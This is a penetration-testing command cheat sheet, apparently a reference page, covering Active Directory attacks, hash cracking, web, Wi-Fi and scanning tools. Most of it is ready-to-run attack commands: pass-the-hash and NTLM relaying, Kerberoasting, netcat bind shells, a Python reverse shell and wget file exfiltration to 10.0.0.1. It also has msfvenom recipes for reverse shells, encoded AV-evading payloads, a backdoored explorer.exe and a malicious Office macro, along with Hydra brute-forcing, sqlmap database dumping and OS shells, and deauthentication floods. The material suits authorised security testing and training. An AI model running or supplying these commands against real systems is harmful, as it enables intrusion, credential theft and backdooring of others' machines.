Reference List
CrackMapExec is a post-exploitation tool that helps automate security assessments of large Active Directory networks. It automates login attempts across multiple computers in the network [Link].
sudo apt-get install crackmapexec -y
If you already have credentials:
crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP
If you only have the hash:
crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0
Replace asd3b4…89c0 with the full hash you obtained.
Responder exploits SMB vulnerabilities [Link] (deprecated version also at [Link]).
locate Responder.py cd /usr/share/responder/ python Responder.py -I eth0 -rdw -v
ntlmrelayx relays a received NTLM hash to a target IP listed in target.txt, gaining access to SMB shares using someone else’s credentials.
locate ntlmrelayx.py cd /opt/impacket/examples python ntlmrelayx.py -tf target.txt -smb2support
GPP-Decrypt decrypts GPP passwords.
gpp-decrypt edBS...lVmQ
Replace edBS…lVmQ with the encrypted GPP password string.
GetUserSPNs is part of a Kerberoast attack. It finds Service Principal Names associated with normal user accounts, which can then be used for an offline brute-force attack against the SPN account’s NTLM hash if valid TGS tickets can be obtained [Link].
python GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request Password: *******
HashCat64 is a powerful brute-force hash cracker, useful for cracking hashes obtained from GetUserSPNs or other sources [Link].
hashcat64.exe --help hashcat64.exe -m 13100 kerberoast.txt rockyou.txt
HashCat is a password cracker [Link].
sudo apt install hashcat hashcat -m 5600 hash.txt rockyou.txt hashcat -m 5600 hash.txt rockyou.txt --force hashcat -I hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule
Note that the hash captured with Responder was copied to hash.txt and mode 5600 is for NetNTLMv2. Use –help to find the module that matches your hash type. The password list used here is rockyou.txt, but another popular option is BreachParse.
The fourth line lists available CPUs and GPUs using -I, then specifies computing devices 1 and 2, sets module 2500 for WPA/WPA2, performance level 3 (1-4), and additional parameters.
Get OneRuleToRuleThemAll from [Link].
NetCat is a tool for creating network-based functionality such as chat, file transfer, remote shell, port scanning, and more [Link].
Server Side (Listener):
nc -nvlp 8080 nc -n -v -l -p 5555 -e /bin/bash nc -n -v -l -p 5555 -e cmd.exe nc -l -p 1234 > receive.file
Client Side:
nc -nv 10.0.0.1 5555 nc -zv domain.com 80-88 nc -w 3 10.0.0.1 1234 < send.file
It can also be accessed via other tools:
wget --post-file=file.txt 10.0.0.1 8080 /bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'
Getting a reverse shell with Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Veil-Framework is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].
git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent
msfVenom is a framework for creating and encrypting payloads. Note on EXITFUNC values: thread (clean exit), process (restarts on exit), seh (restarts the process on error).
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
The first example creates a payload with file type 'c', architecture 32-bit, and excludes the bad character '\x00'. Since no output file is specified, the shellcode is printed to the screen for copying.
msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest
The second example sets the format to 'raw', outputs to 'payload.bin', and attempts to generate the smallest shellcode possible.
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26
The third example creates a payload with 3 iterations of the 'shikata_ga_nai' encoder, no null bytes, output in 'python' format, and 26 NOPs prepended.
msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe
The fourth example takes an existing 'explorer.exe' and uses '-k' to run the payload in a separate thread, outputting 'explorer_backdoor.exe' with the appended payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe
The fifth example creates a Meterpreter reverse shell as an exe, letting msfvenom automatically resolve the IP of interface eth0.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba
The last example creates a macro for use with Microsoft Office tools.
Mentalist creates password lists using rule sets and can also import existing lists such as CUPP's output [Link].
mentalist
CUPP (Common User Passwords Profiler) generates a list of possible passwords based on information about the target and their associates, such as first names, last names, nicknames, and birthdates [Link].
sudo python cupp.py -i
Skipfish is a website spider/crawler that also tests for various vulnerable parameters and configurations.
skipfish -YO -o ~/Desktop/folder http://192.168.x.x
Grabber is a spider/crawler that tests for SQLi (SQL Injection) and XSS (Cross-Site Scripting).
grabber --spider 1 --sql --xss --url http://example.com
Httrack recursively downloads a website, creating a local mirror.
httrack http://example.com -O ~/Desktop/file
Note: the same can be done with wget. The default depth is 5; the example below sets it to 10:
wget -r -l 10 http://example.com
Wafw00f detects the presence of a Web Application Firewall.
wafw00f http://example.com
Hydra is a brute-force login cracker supporting numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, and XMPP [Link].
hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1 hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v
The first example attempts to guess the password for userName using Metasploit's unix_passwords.txt list with 5 threads over SSH.
The second example attempts to log in to an FTP server using a list of usernames and the rockyou wordlist.
The third example targets an HTTP POST login form, supplying username and password lists and marking failed attempts by the word "incorrect" in the response.
pw-Inspector filters a wordlist by password length criteria (from 6 to 10 characters in the example below).
pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10
MACof floods a switch with random MAC addresses.
macof macof -n 100 macof -i eth0 -d 192.168.1.1 -y 80
Sublist3r is a tool designed to passively enumerate subdomains of websites using OSINT [Link].
sublist3r -d example.com -t 5 -e bing
Nessus is a powerful professional vulnerability scanner [Link].
sudo systemctl start nessusd.service https://localhost:8834/
XSSer is an automated framework for detecting, exploiting, and reporting XSS vulnerabilities in web applications.
sudo apt install xsser xsser --gtk xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp "" xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp ""
Replace the value of the target parameter with XSS to tell XSSer where to inject payloads.
SQLmap automates the detection and exploitation of SQL injection flaws and can take over database servers [Link].
sudo apt install sqlmap python sqlmap.py --help sqlmap -u "https://example.com/search.php?q=" sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3 sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10 sqlmap --url="https://example.com/login.php" --data="user=test&password=test" sqlmap -u "https://example.com/search.php?q=" --batch --banner sqlmap -u "https://example.com/search.php?q=" --batch --passwords sqlmap -u "https://example.com/search.php?q=" --batch --dbs sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName sqlmap -u "https://example.com/search.php?q=" --batch --os-shell
Note the level (1-5) and risk (1-3) settings for test intensity, dbs for listing database names, all for retrieving everything, and threads (1-10) for faster execution. The data argument provides POST variables.
DirBuster is designed to brute-force directory and file names on web/application servers.
dirb https://example.com/ dirb https://example.com/ wordslist.txt OR # also available with GUI
MDK3 exploits common Wi-Fi weaknesses, including brute-forcing hidden SSIDs, beacon flooding, authentication DoS, deauthentication, WPA downgrade, continuous traffic cancellation, stress testing, and more.
sudo apt install mdk3 sudo mdk3 wlan0mon a sudo mdk3 wlan0mon d -c 6 -b mac_list.txt sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt
Note: the third line floods channel 6 with deauthentication messages using mac_list.txt. On the fourth line, replace 00:00:00:00:00:00 with the MAC address of the access point hosting the hidden SSID, and ssid_list.txt with the wordlist for brute-forcing.
Sherlock is an OSINT tool that searches for social media accounts matching a given username [Link].
sudo apt install sherlock sherlock --timeout 1 username
MasScan is a mass scanner powerful enough to scan the entire Internet. Use it carefully as scanning unauthorized networks is illegal [Link].
masscan 0.0.0.0/0 --port 12345 --rate 1000000 -oX output.txt --exclude private_networks.txt
The output.txt file will be in XML format. The exclude argument prevents scanning non-public network ranges. See private_networks.txt below:
10.0.0.0/8 172.16.0.0/12 192.168.0.0/16